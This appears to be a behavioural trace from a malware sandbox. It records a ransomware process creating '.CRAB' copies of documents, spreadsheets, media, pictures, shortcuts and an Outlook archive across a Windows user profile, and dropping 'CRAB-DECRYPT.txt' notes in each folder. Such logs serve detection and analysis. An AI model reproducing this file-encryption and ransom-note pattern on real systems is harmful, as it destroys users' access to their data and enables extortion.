Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\bx25n_zEWz.xlsx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\19Yvp6ANDVIkDiFIG.doc.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\5h7CA4lK26Fq5Gv.ods.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\KfXa.ods.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\mUQn.ppt.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\QAK6u0jBm85H.pps.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\wOPqVqBS4.ots.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\XEXg3o.pdf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\Odz5x6Cb_LLwBi.pptx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\S6BPLG0C-Vmy7in3T.xlsx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\EwV15du8z.pptx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\gt0JBiTNv3SX i75V.pdf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\hzs6jyNVZgY-kQaIa.ods.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\j_3PZxyiwO8w.rtf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\RTDYFjRJhM5Cy.ots.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\s t6meCIdADoLbUSwk6.pps.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\ZD5GD\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\ZD5GD\KVmrnWSNH.pps.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\ZD5GD\qJDSpaff7iaDch.pps.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\ZD5GD\qW66q 1yIljY0F4.pptx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Mkb YyyyeqwKZoQQHy.ods.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Music\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Pictures\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Videos\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ohl4MR.xlsx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\spA-_rjrgAuP4BLMuw.docx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\sRLr2c5BWRPE.docx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VtAGTwu.docx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_iy0CK cncf.csv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Downloads\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Links\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\8n5aqpCDq_A.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\1unio5SG06C_y d Xnw.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\3n-hfMjTrkH.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\HHRphAnegwv.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\icjLe.m4a.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Kn_tmM6zw3.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\uM3BQJ8dxr7D.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\ixvZieErLXMX.m4a.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\o5mx 1k.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\w-EbBm2RRAB-8PrlGt8u.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\xYTuu-kXIKL5LgiaEv.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\2NCRqm0mX6PHLyeD.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\3TQ_ma.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\FgwN2ObhM.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\fJ1WwAMKbwQ2.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\GZFhWL9G.m4a.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\VVQF1K6etogvy10qk.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\W8BbZpX N5yyTX\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\W8BbZpX N5yyTX\71dtLIqFptp6t.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\W8BbZpX N5yyTX\FoYg3B8-Vkug_.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\W8BbZpX N5yyTX\Zkl31vPQAP.m4a.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\iu1GhB.m4a.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\vKIdu\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\vKIdu\SVWbxUJ-ugmt.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\vKIdu\tXVdj.m4a.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\vKIdu\Z9FFFe9.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\My Documents\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\NetHood\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-6fUSHUpsr8FSTTKUq0D.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\6qQpSiPpNSk.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\eN5O5aKTd.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\F-CpyxaJutY\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\F-CpyxaJutY\6tM CrzEeveh.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\BlrvsT4mPTcJLvoVtV.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\4Vbmi4z7fsuNWh5E.gif.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\0R3qIB.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\fWZWDSH3brhjXb.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\eoea 7EZS8omTG ag\URBG52buEjVqoUXZD\zEAuwoyX\IXlZ1vW89Rj9\mWsJT5P5\JJcQ_oX5i w.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
